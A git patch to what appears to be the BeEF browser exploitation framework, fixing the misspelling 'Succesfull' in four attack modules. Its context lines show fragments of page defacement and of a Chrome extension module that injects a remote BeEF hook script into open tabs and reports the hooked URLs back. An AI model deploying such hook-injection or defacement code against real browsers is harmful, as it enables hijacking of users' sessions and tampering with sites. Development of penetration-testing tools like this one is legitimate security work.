From 0f62af06dc8da9a6e2707984a110b6a2ac364035 Mon Sep 17 00:00:00 2001 From: bcoles Date: Mon, 26 Dec 2011 12:22:08 +1030 Subject: [PATCH] Ess eue double see E double ess eff eue el --- modules/browser/deface_web_page/command.js | 2 +- modules/browser/replace_video/command.js | 2 +- modules/browser/rickroll/command.js | 2 +- modules/chrome_extensions/inject_beef/command.js | 2 +- 4 files changed, 4 insertions(+), 4 deletions(-) diff --git a/modules/browser/deface_web_page/command.js b/modules/browser/deface_web_page/command.js index 52c09d1cd..35da8d22a 100644 --- a/modules/browser/deface_web_page/command.js +++ b/modules/browser/deface_web_page/command.js @@ -16,5 +16,5 @@ beef.execute(function() { document.body.innerHTML = "<%= @deface_content %>"; - beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Deface Succesfull"); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Deface Successful"); }); diff --git a/modules/browser/replace_video/command.js b/modules/browser/replace_video/command.js index 0780e369b..cb46e5cf3 100644 --- a/modules/browser/replace_video/command.js +++ b/modules/browser/replace_video/command.js @@ -19,5 +19,5 @@ beef.execute(function() { var height = $j(this).css('height'); $j(this).replaceWith(''); }); - beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Replace Video Succesfull"); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Replace Video Successful"); }); diff --git a/modules/browser/rickroll/command.js b/modules/browser/rickroll/command.js index 3ba75b434..f1116322c 100644 --- a/modules/browser/rickroll/command.js +++ b/modules/browser/rickroll/command.js @@ -21,5 +21,5 @@ beef.execute(function() { $j('body').html(''); - beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Rickroll Succesfull"); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Rickroll Successful"); }); diff --git a/modules/chrome_extensions/inject_beef/command.js b/modules/chrome_extensions/inject_beef/command.js index 7dc843abf..fc71bdfef 100755 --- a/modules/chrome_extensions/inject_beef/command.js +++ b/modules/chrome_extensions/inject_beef/command.js @@ -15,7 +15,7 @@ beef.execute(function() { + beefHookUri + "'; newScript.setAttribute('onload','beef_init()'); document.getElementsByTagName('head')[0].appendChild(newScript);"}) //send back the new domain that will be hooked :-) - beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Succesfully injected BeEF hook on: ' + tabs[t].url); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Successfully injected BeEF hook on: ' + tabs[t].url); } } })